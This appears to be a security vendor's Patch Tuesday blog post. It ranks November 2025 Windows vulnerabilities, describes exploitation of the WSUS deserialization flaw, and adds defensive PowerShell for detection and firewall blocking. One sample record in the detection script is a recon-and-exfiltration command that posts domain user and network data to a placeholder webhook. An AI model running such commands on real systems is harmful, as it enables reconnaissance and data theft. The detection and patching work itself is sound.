Threat intel · 3 MIN READ · BEN NAHORNEY AND MATT JASTRAM · NOV 12, 2025 · TAGS: vulnerability prioritization
TL;DR
- This month we’re reviewing threat actor activity associated with CVE-2025-59287, a critical vulnerability in the Windows Server Update Services (WSUS) process.
- Microsoft released 63 new CVEs this month.
- Read on to get a high-level overview of the vulnerabilities we think are most deserving of remediation ASAP.
November marks the beginning of the end-of-year sprint as orgs prepare for the holiday schedules. In the midst of all of that comes another Patch Tuesday, and this month’s security updates deserve prompt attention to ensure you’re not carrying vulnerabilities with you through the holiday season.
Patch Tuesday: November 11, 2025
There are 63 new CVEs in this month’s batch, including four marked as critical, two with remote code execution (RCE) conditions, and one zero-day vulnerability (and a partridge in a pear tree…too soon?). We’ve reviewed the release to save you time and think you should prioritize these vulnerabilities:
- Windows Kernel Elevation of Privilege Vulnerability (CVE-2025-62215): This is a zero-day vulnerability in the Windows kernel that could garner an attacker SYSTEM privileges. Exploitation involves winning a race condition, meaning specific timing and conditions are required to pull off a successful attack. This complexity would explain the CVSS score of 7.0, though clearly threat actors are finding success here. CISA just added this CVE to the Known Exploited Vulnerabilities (KEV) catalog.
- GDI+ Remote Code Execution Vulnerability (CVE-2025-60724): This is an RCE vulnerability in the Windows graphics subsystem with a CVSS score of 9.8. What’s noteworthy here is a threat actor could implant a specially crafted file in a web page that, when an unsuspecting user views it, could call the vulnerable graphics library, trigger the vulnerable code, and allow an attacker to corrupt memory on the vulnerable device, gaining control over the system.
- Microsoft Office Remote Code Execution Vulnerability (CVE-2025-62199): What’s concerning about this Office-related vulnerability is that the Preview Pane in Outlook could be used to trigger it. While Microsoft doesn’t go into great detail about the level of user interaction required, it implies that this “preview pain” (…I’ll see myself out…) could allow an attacker to send a specially crafted email triggering the exploit when a user scrolls through emails in Outlook, assuming the Preview Pane feature is enabled.
- Microsoft SQL Server Elevation of Privilege Vulnerability (CVE-2025-59499): This SQL injection vulnerability is worth prioritizing because it doesn’t require local access: a remote attacker who has obtained low-privilege credentials could exploit it to gain access to sensitive information within the database. This CVE has been given a CVSS score of 8.8.
Exploit Tales: Windows Server Update Services (WSUS)
This month we’re taking a look at CVE-2025-59287, a vulnerability in Windows Server Update Services (WSUS), Microsoft’s legacy centralized update distribution service for keeping on-premises systems updated. This vulnerability allows unauthorized attackers to remotely execute code on impacted systems.
This is an unsafe deserialization vulnerability, meaning a threat actor could send specially crafted serialized data to the WSUS service, which deserializes and acts on it without properly validating what it was sent, resulting in code execution. Code execution within the WSUS process—which can run under the SYSTEM user—could give an attacker a foothold in the part of an organization’s infrastructure responsible for updating and managing endpoints. With SYSTEM-level control of such a machine, it’s possible for attackers to push out malicious payloads disguised as Microsoft updates to network endpoints.
This CVE was initially disclosed in October’s Patch Tuesday release, where we highlighted it as one of the key vulnerabilities to address. However, the Microsoft fix didn’t fully remediate the vulnerability for all Windows Server versions that were susceptible. Exploit code began to circulate online and threat actors started targeting vulnerable servers, leading Microsoft to release a new, out-of-band patch to address this activity.
Expel saw several incidents where threat actors attempted to exploit vulnerable systems. In each case, the threat actors ran the following PowerShell command on the targeted server:
This command targets the IP address where the vulnerable WSUS instance is located using HTTPS port 8531—one of two default ports used by WSUS (the other is HTTP port 8530).
It then uses `net user /domain` to display a list of all user accounts in the domain and `ipconfig /all` for information about network adapters on the server, including IP addresses, subnet masks, and configured DNS servers.
Finally, it attempts to upload the gathered information to a predetermined webhook site managed by the bad actors. In most cases like this, threat actors are gathering information in order to learn about the network configuration before launching further attacks.
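The pattern described above (domain user enumeration, adapter enumeration, and an outbound upload in a single PowerShell invocation) is a good candidate for a detection keyed on process-creation telemetry from your WSUS hosts. The following is an added example, not code from the Expel post: it scores command lines against those three indicators and only flags a record when recon and an upload appear together, so a lone administrative `ipconfig /all` does not page anyone. The field names and the sample records are constructed; adapt the input to whatever your EDR, Sysmon, or Event ID 4688 pipeline exports.

```powershell
# Added example (not from the Expel post). Scores process-creation records for the
# reconnaissance-then-upload pattern described in the post.

function Test-WsusReconPattern {
    param([Parameter(Mandatory)][string]$CommandLine)

    # Indicators taken from the post's description of the observed command.
    # -match is case-insensitive by default, which is what we want here.
    $indicators = [ordered]@{
        DomainUserEnum = 'net\s+user\s+/domain'
        AdapterEnum    = 'ipconfig\s+/all'
        OutboundUpload = 'Invoke-WebRequest|Invoke-RestMethod|curl(\.exe)?\s|https?://'
    }

    $hits = @(
        $indicators.GetEnumerator() |
            Where-Object { $CommandLine -match $_.Value } |
            ForEach-Object { $_.Key }
    )

    [pscustomobject]@{
        Matched    = $hits
        Score      = $hits.Count
        # Require an upload indicator plus at least one recon indicator before alerting.
        Suspicious = ($hits -contains 'OutboundUpload') -and ($hits.Count -ge 2)
    }
}

# Constructed sample records, not real telemetry. The webhook host is a placeholder.
$sampleEvents = @(
    [pscustomobject]@{ Host = 'wsus01'; Image = 'powershell.exe'
        CommandLine = 'powershell.exe -c "net user /domain; ipconfig /all" | Invoke-WebRequest -Uri https://webhook.example.invalid/collect -Method Post' },
    [pscustomobject]@{ Host = 'wsus01'; Image = 'powershell.exe'
        CommandLine = 'powershell.exe -c "ipconfig /all"' },
    [pscustomobject]@{ Host = 'fs02';   Image = 'powershell.exe'
        CommandLine = 'powershell.exe -c "Get-Service wuauserv"' }
)

$sampleEvents | ForEach-Object {
    $verdict = Test-WsusReconPattern -CommandLine $_.CommandLine
    [pscustomobject]@{
        Host       = $_.Host
        Suspicious = $verdict.Suspicious
        Matched    = ($verdict.Matched -join ',')
    }
} | Format-Table -AutoSize
```

Only the first record is flagged (all three indicators); the second matches a single indicator and the third matches none. Scope the query to hosts where WSUS is actually installed to keep the false-positive rate down, and consider adding the parent process as a second signal once you have confirmed which process hosts WSUS in your environment.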
To protect against these attacks, we suggest applying the latest patch for CVE-2025-59287. If you can’t immediately patch it, block all inbound traffic on ports 8530 and 8531. It’s also important to ensure that servers running WSUS aren’t publicly exposed, as this poses a significant risk to an organization.
CISA provides additional guidance on identifying if WSUS is running on a server. You can use PowerShell to check if WSUS is installed (`Get-WindowsFeature -Name UpdateServices`) or use the Server Manager Dashboard to check if WSUS is turned on as a server role. If your organization no longer uses WSUS, it should be disabled and removed to mitigate this and other vulnerabilities.
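To put the checks above into one repeatable pass, here is an added example (not code from the Expel post or from CISA's guidance) that combines the `Get-WindowsFeature` check with a look at whether anything is listening on the two default WSUS ports and whether a stopgap block rule is already in place. It assumes it runs elevated on the Windows Server being assessed, and the firewall rule display name is an invented label.

```powershell
# Added example, not from the Expel post. Assess a server's WSUS exposure and,
# if needed, apply the inbound block the post recommends as a temporary measure.
# Assumes an elevated session on Windows Server (ServerManager and NetSecurity modules).

$StopgapRuleName = 'Block inbound WSUS (CVE-2025-59287 stopgap)'   # invented label
$WsusPorts       = 8530, 8531                                       # defaults named in the post

function Get-WsusExposure {
    [CmdletBinding()]
    param()

    # The UpdateServices feature name is the one the post cites.
    $feature = Get-WindowsFeature -Name UpdateServices -ErrorAction SilentlyContinue
    $installed = [bool]($feature -and $feature.Installed)

    # Anything listening on 8530/8531, regardless of which process owns it.
    $listening = @(
        Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
            Where-Object { $WsusPorts -contains $_.LocalPort } |
            Select-Object -ExpandProperty LocalPort -Unique
    )

    $ruleExists = [bool](Get-NetFirewallRule -DisplayName $StopgapRuleName -ErrorAction SilentlyContinue)

    [pscustomobject]@{
        WsusInstalled   = $installed
        ListeningPorts  = $listening
        BlockRuleExists = $ruleExists
    }
}

function Block-WsusInbound {
    # Inbound block for both default ports on every profile. This also stops
    # legitimate WSUS clients from checking in, so remove it once patched.
    New-NetFirewallRule -DisplayName $StopgapRuleName `
        -Direction Inbound -Action Block -Protocol TCP -LocalPort $WsusPorts `
        -Profile Any -Enabled True | Out-Null
}

$exposure = Get-WsusExposure
$exposure | Format-List

if ($exposure.WsusInstalled -and $exposure.ListeningPorts.Count -gt 0 -and -not $exposure.BlockRuleExists) {
    Write-Warning ("WSUS is installed and listening on {0} with no stopgap rule. " +
                   "Apply the out-of-band patch, or run Block-WsusInbound until you can.") -f ($exposure.ListeningPorts -join ', ')
}
```

Blocking on the host itself is the bluntest option; where possible, filter 8530/8531 at the network edge and between segments so that only intended clients reach the server, and never expose it to the internet. Once the patch is applied, remove the rule with `Remove-NetFirewallRule -DisplayName` and the same label. If the feature is installed but no longer in use, `Uninstall-WindowsFeature -Name UpdateServices` takes the role off the server entirely, which is the outcome the post recommends.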
That’s all we have for this month’s Patch Tuesday blog. If you have questions about the vulnerabilities discussed here, drop us a line.
